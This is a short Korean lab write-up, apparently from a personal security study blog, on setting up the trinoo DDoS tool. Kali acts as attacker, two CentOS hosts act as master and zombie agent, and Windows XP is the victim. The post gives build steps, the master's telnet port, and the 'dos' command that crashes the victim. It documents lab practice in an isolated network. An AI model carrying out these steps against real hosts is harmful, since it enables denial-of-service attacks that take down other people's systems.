Kali ( telnet = 공격자 ) ,
CentOS_32 두 대 ( master = C&C server, agent = Zombie PC ) ,
XP ( wireshark = 희생자 )
1. CentOS 32비트 에다가 trinoo.tar 파일 받아와서 클론 만들어주기
네트워크 주소 바꾸기
ifconfig -> 네트워크(eth0) 인식 안 될 때
# vi /etc/sysconfig/network-scripts/ifcfg-eth0
맥주소 맞게 입력해주고
* #vi /etc/udev/rules.d/70-persistent-net.rules
가서 맞지 않는 맥주소 부분 지워주고, 네트워크 맞는 것 하나만 남겨두고 저장 후 재부팅.
2. master (200.200.200.15), agent (200.200.200.146) 에서 wget trinoo.tar 둘 다 설치 해주고
3. master 서버에서
다음과 같이 trinoo 압축 풀고 make 로 설치까지 해준다.
4. agent 에서,
[root@localhost ~]# cd daemon
[root@localhost daemon]# pwd
/root/daemon
[root@localhost daemon]# ls
ns.c
[root@localhost daemon]# cp /root/master/* /root/daemon/
마스터 주소 입력해주기 (master<->agent 연결 작업)
[root@localhost daemon]# vi ns.c
[root@localhost daemon]# vi Makefile
저장후
# make
# ./daemon 실행 후 확인
참고로 4개의 PC 다 네트워크는 브릿지(Bridge)로 설정
5. kali 에서,
telnet을 이용하여 master로 접속
# telnet 200.200.200.145 (마스터주소) 27665
6. XP 죽어라!!
dos 200.200.200.151 (xp주소)
XP 서버가 검정화면이 나왔다가,
아무것도 움직이지 않게 된 것을 볼 수 있다.
서버 쥬금.
'INFOSEC > NETWORK' 카테고리의 다른 글
| DNS - TCP 53 (Zonetransfer) (0) | 2019.10.15 |
|---|---|
| NAC (Network Access Control) (0) | 2019.10.08 |
| TCP Session Hijacking ) NetCat (0) | 2019.10.04 |
| 네트워크 보안 운영 (0) | 2019.10.02 |
| DHCP Attack (0) | 2019.10.02 |
